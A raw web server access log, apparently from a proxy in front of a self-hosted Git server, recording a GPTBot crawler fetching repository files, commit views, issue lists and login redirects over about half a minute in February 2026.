"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/cpp/Makefile" -[17/Feb/2026:17:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply" -[17/Feb/2026:17:57:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10936] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip?display=rendered" [Client 74.7.227.38] [Length 10956] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:17:57:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 969] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/activate.fish" -[17/Feb/2026:17:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11754] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" -[17/Feb/2026:17:57:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:57:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:57:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/.vscode/settings.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:57:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/tasks.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:57:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode/tasks.json" -[17/Feb/2026:17:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:17:57:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:57:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 32925] [Gzip 23.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" -[17/Feb/2026:17:57:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:17:57:48 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:49 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:17:57:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=closed&type=all" -[17/Feb/2026:17:57:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:17:57:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcmake_clean.cmake" [Client 74.7.227.38] [Length 25393] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:17:57:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.ts" [Client 74.7.227.38] [Length 24966] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:17:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fCMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 53596] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" -[17/Feb/2026:17:57:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 24199] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" -[17/Feb/2026:17:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCCompiler.cmake" [Client 74.7.227.38] [Length 27775] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:17:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 29533] [Gzip 5.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:17:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:17:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" -[17/Feb/2026:17:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:17:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" -[17/Feb/2026:17:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" -[17/Feb/2026:17:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:17:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" -[17/Feb/2026:17:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:17:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f.vscode%2fsettings.json" [Client 74.7.227.38] [Length 21484] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" -[17/Feb/2026:17:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" -[17/Feb/2026:17:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14917] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" -[17/Feb/2026:17:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" -[17/Feb/2026:17:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" -[17/Feb/2026:17:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" -[17/Feb/2026:17:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:17:58:06 +0000] - 200 200 - GET 